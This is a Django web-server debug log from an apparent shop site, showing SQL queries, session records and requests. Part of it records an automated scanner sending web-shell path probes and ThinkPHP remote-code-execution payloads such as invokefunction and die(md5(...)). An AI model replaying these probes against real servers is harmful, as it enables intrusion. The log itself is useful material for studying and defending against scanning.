2019-12-06 14:00:32,526 utils 32196 139885071562496 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T14:00:32.515570+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 14, 0, 32, 515570, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 14:00:32,530 utils 32196 139885071562496 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 14:00:32,533 utils 32196 139885071562496 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 2; args=(2,) DEBUG 2019-12-06 14:00:32,570 utils 32196 139885071562496 (0.001) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'shop' AND "django_content_type"."model" = 'product'); args=('shop', 'product') DEBUG 2019-12-06 14:00:32,624 utils 32196 139885071562496 (0.002) DECLARE "_django_curs_139885071562496_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-06 14:00:32,695 utils 32196 139885071562496 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T14:00:32.693016+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 14, 0, 32, 693016, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 14:00:32] "GET /shop/product/2/change/ HTTP/1.0" 200 9337 DEBUG 2019-12-06 14:00:33,014 utils 32196 139885071562496 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T14:00:33.004365+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 14, 0, 33, 4365, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 14:00:33,016 utils 32196 139885071562496 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 14:00:33] "GET /jsi18n/ HTTP/1.0" 200 3223 [06/Dec/2019 14:05:02] "GET / HTTP/1.0" 302 0 [06/Dec/2019 14:10:05] "GET / HTTP/1.0" 302 0 [06/Dec/2019 14:19:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 14:28:02] "GET / HTTP/1.0" 302 0 [06/Dec/2019 14:36:15] "GET / HTTP/1.0" 302 0 [06/Dec/2019 14:41:27] "GET / HTTP/1.0" 302 0 [06/Dec/2019 14:46:30] "GET / HTTP/1.0" 302 0 [06/Dec/2019 14:51:32] "GET / HTTP/1.0" 302 0 [06/Dec/2019 14:52:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 14:52:42,933 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'qniuwjyjyllays6hcnaoi7ezashaktfq' LIMIT 1; args=('qniuwjyjyllays6hcnaoi7ezashaktfq',) DEBUG 2019-12-06 14:52:42,935 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('qniuwjyjyllays6hcnaoi7ezashaktfq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-20T14:52:42.934039+00:00'::timestamptz); args=('qniuwjyjyllays6hcnaoi7ezashaktfq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 14, 52, 42, 934039, tzinfo=)) [06/Dec/2019 14:52:42] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Dec/2019 14:56:35] "GET / HTTP/1.0" 302 0 [06/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 [06/Dec/2019 15:10:06] "GET / HTTP/1.0" 302 0 [06/Dec/2019 15:13:53] "GET / HTTP/1.0" 302 0 [06/Dec/2019 15:16:56] "GET / HTTP/1.0" 302 0 [06/Dec/2019 15:21:59] "GET / HTTP/1.0" 302 0 [06/Dec/2019 15:27:02] "GET / HTTP/1.0" 302 0 [06/Dec/2019 15:32:04] "GET / HTTP/1.0" 302 0 [06/Dec/2019 15:37:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 15:42:40] "GET / HTTP/1.0" 302 0 [06/Dec/2019 15:47:43] "GET / HTTP/1.0" 302 0 [06/Dec/2019 15:54:11] "GET / HTTP/1.0" 302 0 [06/Dec/2019 15:59:13] "GET / HTTP/1.0" 302 0 [06/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [06/Dec/2019 16:10:05] "GET / HTTP/1.0" 302 0 [06/Dec/2019 16:16:15] "GET / HTTP/1.0" 302 0 [06/Dec/2019 16:18:31] "GET / HTTP/1.0" 302 0 [06/Dec/2019 16:21:18] "GET / HTTP/1.0" 302 0 [06/Dec/2019 16:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Dec/2019 16:26:21] "GET / HTTP/1.0" 302 0 [06/Dec/2019 16:31:23] "GET / HTTP/1.0" 302 0 [06/Dec/2019 16:37:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 16:46:40] "GET / HTTP/1.0" 302 0 [06/Dec/2019 16:51:43] "GET / HTTP/1.0" 302 0 [06/Dec/2019 16:55:18] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 16:55:19,411 utils 32196 139885071562496 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'vmz4s0itxay679o6qhld28o0gsk2nr2y' LIMIT 1; args=('vmz4s0itxay679o6qhld28o0gsk2nr2y',) DEBUG 2019-12-06 16:55:19,413 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('vmz4s0itxay679o6qhld28o0gsk2nr2y', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-20T16:55:19.412090+00:00'::timestamptz); args=('vmz4s0itxay679o6qhld28o0gsk2nr2y', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 16, 55, 19, 412090, tzinfo=)) [06/Dec/2019 16:55:19] "GET /login/?next=/ HTTP/1.0" 200 1786 [06/Dec/2019 16:56:46] "GET / HTTP/1.0" 302 0 [06/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [06/Dec/2019 17:05:58] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 17:06:01,042 utils 32196 139885071562496 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'zw01nijudtlkgrasz6u9qenm0wu6bwq9' LIMIT 1; args=('zw01nijudtlkgrasz6u9qenm0wu6bwq9',) DEBUG 2019-12-06 17:06:01,045 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('zw01nijudtlkgrasz6u9qenm0wu6bwq9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-20T17:06:01.043322+00:00'::timestamptz); args=('zw01nijudtlkgrasz6u9qenm0wu6bwq9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 17, 6, 1, 43322, tzinfo=)) [06/Dec/2019 17:06:01] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /robots.txt [06/Dec/2019 17:06:04] "GET /robots.txt HTTP/1.0" 404 6623 Not Found: /sitemap.xml [06/Dec/2019 17:06:07] "GET /sitemap.xml HTTP/1.0" 404 6626 [06/Dec/2019 17:10:05] "GET / HTTP/1.0" 302 0 [06/Dec/2019 17:15:08] "GET / HTTP/1.0" 302 0 [06/Dec/2019 17:20:11] "GET / HTTP/1.0" 302 0 [06/Dec/2019 17:25:14] "GET / HTTP/1.0" 302 0 [06/Dec/2019 17:30:17] "GET / HTTP/1.0" 302 0 [06/Dec/2019 17:37:37] "GET / HTTP/1.0" 302 0 [06/Dec/2019 17:44:01] "GET / HTTP/1.0" 302 0 [06/Dec/2019 17:49:52] "GET / HTTP/1.0" 302 0 [06/Dec/2019 17:55:18] "GET / HTTP/1.0" 302 0 [06/Dec/2019 18:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [06/Dec/2019 18:05:02] "GET / HTTP/1.0" 302 0 [06/Dec/2019 18:06:09] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [06/Dec/2019 18:06:09] "GET /robots.txt HTTP/1.0" 404 6623 Not Found: /Adminb5512046/Login.php [06/Dec/2019 18:06:10] "POST /Adminb5512046/Login.php HTTP/1.0" 404 6663 [06/Dec/2019 18:06:13] "GET / HTTP/1.0" 302 0 Not Found: /l.php [06/Dec/2019 18:06:13] "GET /l.php HTTP/1.0" 404 6608 Not Found: /phpinfo.php [06/Dec/2019 18:06:14] "GET /phpinfo.php HTTP/1.0" 404 6626 Not Found: /index.php [06/Dec/2019 18:06:16] "POST /index.php HTTP/1.0" 404 6621 Not Found: /bbs.php [06/Dec/2019 18:06:16] "POST /bbs.php HTTP/1.0" 404 6615 Not Found: /forum.php [06/Dec/2019 18:06:17] "POST /forum.php HTTP/1.0" 404 6621 Not Found: /bbs/index.php [06/Dec/2019 18:06:20] "POST /bbs/index.php HTTP/1.0" 404 6633 Not Found: /forum/index.php [06/Dec/2019 18:06:20] "POST /forum/index.php HTTP/1.0" 404 6639 Not Found: /forums/index.php [06/Dec/2019 18:06:22] "POST /forums/index.php HTTP/1.0" 404 6642 DEBUG 2019-12-06 18:06:23,157 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav'; args=('webdav',) Not Found: /webdav/ [06/Dec/2019 18:06:23] "GET /webdav/ HTTP/1.0" 404 1728 Not Found: /help.php [06/Dec/2019 18:06:25] "GET /help.php HTTP/1.0" 404 6617 Not Found: /java.php [06/Dec/2019 18:06:25] "GET /java.php HTTP/1.0" 404 6617 Not Found: /_query.php [06/Dec/2019 18:06:25] "GET /_query.php HTTP/1.0" 404 6623 Not Found: /test.php [06/Dec/2019 18:06:26] "GET /test.php HTTP/1.0" 404 6617 Not Found: /db_pma.php [06/Dec/2019 18:06:28] "GET /db_pma.php HTTP/1.0" 404 6623 Not Found: /logon.php [06/Dec/2019 18:06:28] "GET /logon.php HTTP/1.0" 404 6620 Not Found: /help-e.php [06/Dec/2019 18:06:30] "GET /help-e.php HTTP/1.0" 404 6623 Not Found: /log.php [06/Dec/2019 18:06:32] "GET /log.php HTTP/1.0" 404 6614 Not Found: /hell.php [06/Dec/2019 18:06:32] "GET /hell.php HTTP/1.0" 404 6617 Not Found: /pmd_online.php [06/Dec/2019 18:06:33] "GET /pmd_online.php HTTP/1.0" 404 6635 Not Found: /shell.php [06/Dec/2019 18:06:36] "GET /shell.php HTTP/1.0" 404 6620 Not Found: /htdocs.php [06/Dec/2019 18:06:38] "GET /htdocs.php HTTP/1.0" 404 6623 Not Found: /b.php [06/Dec/2019 18:06:38] "GET /b.php HTTP/1.0" 404 6608 Not Found: /desktop.ini.php [06/Dec/2019 18:06:40] "GET /desktop.ini.php HTTP/1.0" 404 6638 Not Found: /z.php [06/Dec/2019 18:06:40] "GET /z.php HTTP/1.0" 404 6608 Not Found: /lala.php [06/Dec/2019 18:06:42] "GET /lala.php HTTP/1.0" 404 6617 Not Found: /wpc.php [06/Dec/2019 18:06:44] "GET /wpc.php HTTP/1.0" 404 6614 Not Found: /wpo.php [06/Dec/2019 18:06:45] "GET /wpo.php HTTP/1.0" 404 6614 Not Found: /muhstik.php [06/Dec/2019 18:06:48] "GET /muhstik.php HTTP/1.0" 404 6626 Not Found: /text.php [06/Dec/2019 18:06:48] "GET /text.php HTTP/1.0" 404 6617 Not Found: /wp-config.php [06/Dec/2019 18:06:50] "GET /wp-config.php HTTP/1.0" 404 6632 Not Found: /muhstik2.php [06/Dec/2019 18:06:52] "GET /muhstik2.php HTTP/1.0" 404 6629 Not Found: /muhstiks.php [06/Dec/2019 18:06:53] "GET /muhstiks.php HTTP/1.0" 404 6629 Not Found: /lol.php [06/Dec/2019 18:06:56] "GET /lol.php HTTP/1.0" 404 6614 Not Found: /uploader.php [06/Dec/2019 18:06:56] "GET /uploader.php HTTP/1.0" 404 6629 Not Found: /cmd.php [06/Dec/2019 18:06:57] "GET /cmd.php HTTP/1.0" 404 6614 Not Found: /cmv.php [06/Dec/2019 18:07:08] "GET /cmv.php HTTP/1.0" 404 6614 Not Found: /cmdd.php [06/Dec/2019 18:07:08] "GET /cmdd.php HTTP/1.0" 404 6617 Not Found: /knal.php [06/Dec/2019 18:07:10] "GET /knal.php HTTP/1.0" 404 6617 Not Found: /shell.php [06/Dec/2019 18:07:12] "GET /shell.php HTTP/1.0" 404 6620 Not Found: /appserv.php [06/Dec/2019 18:07:12] "GET /appserv.php HTTP/1.0" 404 6626 Not Found: /phpmyadmin/scripts/setup.php [06/Dec/2019 18:07:16] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6677 Not Found: /phpMyAdmin/scripts/setup.php [06/Dec/2019 18:07:18] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6677 Not Found: /scripts/db___.init.php [06/Dec/2019 18:07:18] "GET /scripts/db___.init.php HTTP/1.0" 404 6659 Not Found: /phpMyAdmin/scripts/db___.init.php [06/Dec/2019 18:07:20] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.0" 404 6692 Not Found: /pma/scripts/setup.php [06/Dec/2019 18:07:22] "GET /pma/scripts/setup.php HTTP/1.0" 404 6656 Not Found: /PMA/scripts/setup.php [06/Dec/2019 18:07:23] "GET /PMA/scripts/setup.php HTTP/1.0" 404 6656 Not Found: /myadmin/scripts/setup.php [06/Dec/2019 18:07:28] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6668 Not Found: /MyAdmin/scripts/setup.php [06/Dec/2019 18:07:30] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6668 Not Found: /PMA/scripts/db___.init.php [06/Dec/2019 18:07:32] "GET /PMA/scripts/db___.init.php HTTP/1.0" 404 6671 Not Found: /myadmin/scripts/db___.init.php [06/Dec/2019 18:07:32] "GET /myadmin/scripts/db___.init.php HTTP/1.0" 404 6683 Not Found: /MyAdmin/scripts/db___.init.php [06/Dec/2019 18:07:33] "GET /MyAdmin/scripts/db___.init.php HTTP/1.0" 404 6683 Not Found: /plugins/weathermap/editor.php [06/Dec/2019 18:07:34] "GET /plugins/weathermap/editor.php HTTP/1.0" 404 6680 Not Found: /weathermap/editor.php [06/Dec/2019 18:07:36] "GET /weathermap/editor.php HTTP/1.0" 404 6656 Not Found: /index.php [06/Dec/2019 18:07:36] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6867 Not Found: /elrekt.php [06/Dec/2019 18:07:37] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6870 DEBUG 2019-12-06 18:07:37,804 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'App'; args=('App',) Not Found: /App/ [06/Dec/2019 18:07:37] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.0" 404 1754 Not Found: /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} [06/Dec/2019 18:07:39] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6771 Not Found: /index.php [06/Dec/2019 18:07:40] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6676 [06/Dec/2019 18:07:41] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 [06/Dec/2019 18:07:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 18:07:42,277 utils 32196 139885071562496 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla'; args=('joomla',) Not Found: /joomla/ [06/Dec/2019 18:07:42] "GET /joomla/ HTTP/1.0" 404 1728 DEBUG 2019-12-06 18:07:42,768 utils 32196 139885071562496 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla'; args=('Joomla',) Not Found: /Joomla/ [06/Dec/2019 18:07:42] "GET /Joomla/ HTTP/1.0" 404 1728 Not Found: /d7.php [06/Dec/2019 18:07:44] "GET /d7.php HTTP/1.0" 404 6611 Not Found: /rxr.php [06/Dec/2019 18:07:44] "GET /rxr.php HTTP/1.0" 404 6614 Not Found: /1x.php [06/Dec/2019 18:07:45] "GET /1x.php HTTP/1.0" 404 6611 Not Found: /home.php [06/Dec/2019 18:07:45] "GET /home.php HTTP/1.0" 404 6617 Not Found: /undx.php [06/Dec/2019 18:07:46] "GET /undx.php HTTP/1.0" 404 6617 Not Found: /spider.php [06/Dec/2019 18:07:46] "GET /spider.php HTTP/1.0" 404 6623 Not Found: /composers.php [06/Dec/2019 18:07:48] "GET /composers.php HTTP/1.0" 404 6632 Not Found: /izom.php [06/Dec/2019 18:07:49] "GET /izom.php HTTP/1.0" 404 6617 Not Found: /composer.php [06/Dec/2019 18:07:50] "GET /composer.php HTTP/1.0" 404 6629 Not Found: /hue2.php [06/Dec/2019 18:07:50] "GET /hue2.php HTTP/1.0" 404 6617 Not Found: /lang.php [06/Dec/2019 18:07:52] "GET /lang.php?f=1 HTTP/1.0" 404 6621 Not Found: /izom.php [06/Dec/2019 18:07:52] "GET /izom.php HTTP/1.0" 404 6617 Not Found: /payload.php [06/Dec/2019 18:07:53] "GET /payload.php HTTP/1.0" 404 6626 Not Found: /new_license.php [06/Dec/2019 18:07:53] "GET /new_license.php HTTP/1.0" 404 6638 Not Found: /images/!.php [06/Dec/2019 18:07:54] "GET /images/!.php HTTP/1.0" 404 6629 Not Found: /images/vuln.php [06/Dec/2019 18:07:54] "GET /images/vuln.php HTTP/1.0" 404 6638 Not Found: /images/attari.php [06/Dec/2019 18:08:00] "GET /images/attari.php HTTP/1.0" 404 6644 Not Found: /images/stories/cmd.php [06/Dec/2019 18:08:04] "GET /images/stories/cmd.php HTTP/1.0" 404 6659 Not Found: /images/stories/filemga.php [06/Dec/2019 18:08:04] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.0" 404 6682 Not Found: /up.php [06/Dec/2019 18:08:06] "GET /up.php HTTP/1.0" 404 6611 Not Found: /laravel.php [06/Dec/2019 18:08:08] "GET /laravel.php HTTP/1.0" 404 6626 Not Found: /huoshan.php [06/Dec/2019 18:08:09] "GET /huoshan.php HTTP/1.0" 404 6626 Not Found: /yu.php [06/Dec/2019 18:08:10] "GET /yu.php HTTP/1.0" 404 6611 Not Found: /ftmabc.php [06/Dec/2019 18:08:12] "GET /ftmabc.php HTTP/1.0" 404 6623 Not Found: /doudou.php [06/Dec/2019 18:08:12] "GET /doudou.php HTTP/1.0" 404 6623 Not Found: /mjx.php [06/Dec/2019 18:08:14] "GET /mjx.php HTTP/1.0" 404 6614 Not Found: /yuyang.php [06/Dec/2019 18:08:16] "GET /yuyang.php HTTP/1.0" 404 6623 Not Found: /zz.php [06/Dec/2019 18:08:17] "GET /zz.php HTTP/1.0" 404 6611 Not Found: /ak.php [06/Dec/2019 18:08:20] "GET /ak.php HTTP/1.0" 404 6611 Not Found: /hhhhhh.php [06/Dec/2019 18:08:24] "GET /hhhhhh.php HTTP/1.0" 404 6623 Not Found: /meijianxue.php [06/Dec/2019 18:08:25] "GET /meijianxue.php HTTP/1.0" 404 6635 Not Found: /no1.php [06/Dec/2019 18:08:25] "GET /no1.php HTTP/1.0" 404 6614 Not Found: /python.php [06/Dec/2019 18:08:26] "GET /python.php HTTP/1.0" 404 6623 Not Found: /woshimengmei.php [06/Dec/2019 18:08:26] "GET /woshimengmei.php HTTP/1.0" 404 6641 Not Found: /indea.php [06/Dec/2019 18:08:27] "GET /indea.php HTTP/1.0" 404 6620 Not Found: /taisui.php [06/Dec/2019 18:08:28] "GET /taisui.php HTTP/1.0" 404 6623 Not Found: /xiaxia.php [06/Dec/2019 18:08:29] "GET /xiaxia.php HTTP/1.0" 404 6623 Not Found: /kk.php [06/Dec/2019 18:08:29] "GET /kk.php HTTP/1.0" 404 6611 Not Found: /xsser.php [06/Dec/2019 18:08:30] "GET /xsser.php HTTP/1.0" 404 6620 Not Found: /zzz.php [06/Dec/2019 18:08:30] "GET /zzz.php HTTP/1.0" 404 6614 Not Found: /99.php [06/Dec/2019 18:08:32] "GET /99.php HTTP/1.0" 404 6611 Not Found: /dp.php [06/Dec/2019 18:08:32] "GET /dp.php HTTP/1.0" 404 6611 Not Found: /hs.php [06/Dec/2019 18:08:33] "GET /hs.php HTTP/1.0" 404 6611 Not Found: /1ts.php [06/Dec/2019 18:08:33] "GET /1ts.php HTTP/1.0" 404 6614 Not Found: /haiyan.php [06/Dec/2019 18:08:34] "GET /haiyan.php HTTP/1.0" 404 6623 Not Found: /phpdm.php [06/Dec/2019 18:08:34] "GET /phpdm.php HTTP/1.0" 404 6620 Not Found: /5678.php [06/Dec/2019 18:08:36] "GET /5678.php HTTP/1.0" 404 6617 Not Found: /root11.php [06/Dec/2019 18:08:38] "GET /root11.php HTTP/1.0" 404 6623 Not Found: /xiu.php [06/Dec/2019 18:08:40] "GET /xiu.php HTTP/1.0" 404 6614 Not Found: /wuwu11.php [06/Dec/2019 18:08:40] "POST /wuwu11.php HTTP/1.0" 404 6624 Not Found: /xw.php [06/Dec/2019 18:08:41] "POST /xw.php HTTP/1.0" 404 6612 Not Found: /xw1.php [06/Dec/2019 18:08:41] "POST /xw1.php HTTP/1.0" 404 6615 Not Found: /9678.php [06/Dec/2019 18:08:43] "POST /9678.php HTTP/1.0" 404 6618 Not Found: /wc.php [06/Dec/2019 18:08:44] "POST /wc.php HTTP/1.0" 404 6612 Not Found: /xx.php [06/Dec/2019 18:08:44] "POST /xx.php HTTP/1.0" 404 6612 Not Found: /xx.php [06/Dec/2019 18:08:45] "POST /xx.php HTTP/1.0" 404 6612 Not Found: /s.php [06/Dec/2019 18:08:45] "POST /s.php HTTP/1.0" 404 6609 Not Found: /sheep.php [06/Dec/2019 18:08:48] "POST /sheep.php HTTP/1.0" 404 6621 Not Found: /my.php [06/Dec/2019 18:08:53] "POST /my.php HTTP/1.0" 404 6612 Not Found: /qq.php [06/Dec/2019 18:08:54] "POST /qq.php HTTP/1.0" 404 6612 Not Found: /aaa.php [06/Dec/2019 18:08:54] "POST /aaa.php HTTP/1.0" 404 6615 Not Found: /jjj.php [06/Dec/2019 18:08:57] "POST /jjj.php HTTP/1.0" 404 6615 Not Found: /www.php [06/Dec/2019 18:09:00] "POST /www.php HTTP/1.0" 404 6615 Not Found: /ffr.php [06/Dec/2019 18:09:01] "POST /ffr.php HTTP/1.0" 404 6615 Not Found: /411.php [06/Dec/2019 18:09:01] "POST /411.php HTTP/1.0" 404 6615 Not Found: /415.php [06/Dec/2019 18:09:02] "POST /415.php HTTP/1.0" 404 6615 Not Found: /421.php [06/Dec/2019 18:09:02] "POST /421.php HTTP/1.0" 404 6615 Not Found: /444.php [06/Dec/2019 18:09:03] "POST /444.php HTTP/1.0" 404 6615 Not Found: /a411.php [06/Dec/2019 18:09:04] "POST /a411.php HTTP/1.0" 404 6618 Not Found: /whoami.php [06/Dec/2019 18:09:05] "POST /whoami.php HTTP/1.0" 404 6624 Not Found: /whoami.php.php [06/Dec/2019 18:09:06] "POST /whoami.php.php HTTP/1.0" 404 6636 Not Found: /9.php [06/Dec/2019 18:09:06] "POST /9.php HTTP/1.0" 404 6609 Not Found: /981.php [06/Dec/2019 18:09:08] "POST /981.php HTTP/1.0" 404 6615 Not Found: /887.php [06/Dec/2019 18:09:09] "POST /887.php HTTP/1.0" 404 6615 Not Found: /888.php [06/Dec/2019 18:09:09] "POST /888.php HTTP/1.0" 404 6615 Not Found: /aa.php [06/Dec/2019 18:09:10] "POST /aa.php HTTP/1.0" 404 6612 Not Found: /bb.php [06/Dec/2019 18:09:10] "POST /bb.php HTTP/1.0" 404 6612 Not Found: /tt.php [06/Dec/2019 18:09:12] "POST /tt.php HTTP/1.0" 404 6612 Not Found: /bbq.php [06/Dec/2019 18:09:12] "POST /bbq.php HTTP/1.0" 404 6615 Not Found: /jj1.php [06/Dec/2019 18:09:13] "POST /jj1.php HTTP/1.0" 404 6615 Not Found: /jbb.php [06/Dec/2019 18:09:13] "POST /jbb.php HTTP/1.0" 404 6615 Not Found: /7o.php [06/Dec/2019 18:09:15] "POST /7o.php HTTP/1.0" 404 6612 Not Found: /qwq.php [06/Dec/2019 18:09:16] "POST /qwq.php HTTP/1.0" 404 6615 Not Found: /nb.php [06/Dec/2019 18:09:16] "POST /nb.php HTTP/1.0" 404 6612 Not Found: /kpl.php [06/Dec/2019 18:09:17] "POST /kpl.php HTTP/1.0" 404 6615 Not Found: /hgx.php [06/Dec/2019 18:09:19] "POST /hgx.php HTTP/1.0" 404 6615 Not Found: /ppl.php [06/Dec/2019 18:09:20] "POST /ppl.php HTTP/1.0" 404 6615 Not Found: /tty.php [06/Dec/2019 18:09:20] "POST /tty.php HTTP/1.0" 404 6615 Not Found: /ooi.php [06/Dec/2019 18:09:21] "POST /ooi.php HTTP/1.0" 404 6615 Not Found: /aap.php [06/Dec/2019 18:09:22] "POST /aap.php HTTP/1.0" 404 6615 Not Found: /app.php [06/Dec/2019 18:09:22] "POST /app.php HTTP/1.0" 404 6615 Not Found: /ioi.php [06/Dec/2019 18:09:24] "POST /ioi.php HTTP/1.0" 404 6615 Not Found: /uuu.php [06/Dec/2019 18:09:26] "POST /uuu.php HTTP/1.0" 404 6615 Not Found: /yyy.php [06/Dec/2019 18:09:26] "POST /yyy.php 